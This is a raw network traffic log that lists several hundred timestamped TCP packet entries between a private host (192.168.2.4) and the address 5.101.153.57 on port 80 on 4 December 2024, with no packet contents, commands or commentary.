Dec 4, 2024 12:16:06.469343901 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.469494104 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.469537973 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.470618010 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.470791101 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.470844030 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.471095085 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.471107006 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.471158981 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.472903013 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.475011110 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.475059986 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.478310108 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.478629112 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.478698015 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.479394913 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.479573011 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.479623079 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.480427027 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.480716944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.480767012 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.481364965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.481669903 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.481710911 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.482634068 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.482959032 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.483006954 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.483618021 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.483941078 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.483989954 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.484584093 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.484919071 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.484962940 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.485785007 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.486134052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.486181974 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.486396074 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.486407995 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.486418962 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.486429930 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.486449003 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.486505985 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.486569881 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.486766100 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.486810923 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.488495111 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.488507986 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.488521099 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.488555908 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.488701105 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.488770962 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.489399910 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.489861012 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.489909887 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.490912914 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.490933895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.490972996 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.491369009 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.491380930 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.491419077 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.491835117 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.492218971 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.492266893 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.493077993 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.493231058 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.493278027 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.494004011 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.494155884 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.494200945 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.494976997 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.495300055 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.495347977 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.496186972 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.496371031 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.496417999 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.497680902 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.499799967 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.499876976 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.501228094 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.501408100 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.501457930 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.502314091 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.502510071 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.502559900 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.503403902 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.503581047 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.503628969 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.504533052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.504719019 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.504772902 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.505455017 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.505634069 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.505681992 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.506548882 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.506755114 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.506798983 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.507652044 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.507841110 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.507884979 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.508436918 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.508449078 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.508496046 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.509134054 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.509512901 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.509567976 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.509870052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.509881020 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.509944916 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.510432005 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.510448933 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.510497093 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.511049986 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.511060953 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.511099100 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.511714935 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.511725903 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.511791945 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.512381077 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.512392044 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.512430906 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.512531996 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.512542963 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.512583971 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.513989925 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.514169931 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.514220953 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.514933109 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.515074015 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.515116930 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.515816927 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.515974998 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.516022921 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.517261028 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.517429113 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.517481089 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.518183947 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.518358946 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.518408060 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.519305944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.519484997 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.519519091 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.520302057 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.520447016 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.520489931 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.521534920 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.521712065 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.521763086 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.522387981 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.522722960 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.522766113 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.523542881 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.523706913 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.523747921 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.524487972 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.575123072 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.668652058 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.668730021 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.668827057 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.669087887 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.669475079 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.669526100 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.670144081 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.670341969 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.670406103 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.671173096 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.671372890 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.671416998 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.672190905 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.672406912 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.672457933 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.673273087 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.673531055 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.673576117 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.674494028 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.674699068 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.674738884 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.675447941 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.675678968 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.675725937 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.676408052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.676635027 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.676682949 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.677455902 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.677684069 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.677735090 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.678529978 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.678715944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.678765059 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.679588079 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.679800987 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.679869890 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.680687904 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.680834055 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.680882931 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.681665897 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.681874990 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.681924105 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.682713985 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.682926893 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.682976961 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.683796883 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.684047937 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.684247017 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.684824944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.685029984 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.685081959 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.685863018 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.686081886 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.686136007 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.686923981 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.687145948 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.687196970 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.688121080 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.688277006 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.688330889 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.689079046 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.689270973 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.689311028 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.690112114 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.690308094 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.690368891 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.691200972 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.691425085 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.691474915 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.692183971 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.692403078 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.692451000 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.693243027 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.693469048 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.693519115 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.694289923 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.694514036 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.694561958 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.695390940 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.695642948 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.695692062 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.696413040 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.696666956 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.696715117 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.697473049 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.697987080 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.698040962 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.698903084 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.699153900 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.699203968 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.700000048 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.700236082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.700283051 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.701172113 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.701363087 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.701423883 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.702085018 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.702236891 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.702286959 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.702886105 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.703030109 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.703074932 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.703850985 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.704134941 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.704180956 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.704943895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.705137014 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.705187082 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.705950022 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.706130981 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.706172943 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.706911087 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.707082987 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.707129955 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.707950115 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.708237886 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.708286047 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.709014893 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.709243059 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.709292889 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.710174084 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.710340023 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.710385084 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.711163998 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.711329937 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.711380959 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.712143898 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.712348938 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.712414980 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.713309050 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.713604927 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.713649035 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.714262962 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.714507103 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.714565992 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.715384007 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.715579987 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.715634108 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.716351986 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.716582060 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.716624022 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.717401981 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.717642069 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.717689037 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.718462944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.718744993 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.718795061 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.719562054 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.719765902 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.719810009 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.720556974 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.720789909 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.720835924 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.721595049 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.721854925 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.721896887 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.722656965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.722867966 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.722930908 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.723643064 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.778280973 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.870075941 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.870219946 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.870346069 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.870552063 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.871000051 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.871045113 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.871557951 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.871787071 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.871834993 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.872615099 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.872811079 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.872855902 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.873800039 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.873997927 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.874042988 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.874715090 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.874923944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.874972105 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.875874043 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.876099110 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.876144886 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.877001047 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.877207041 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.877254009 CET	49730	80	192.168.2.4	5.101.153.57
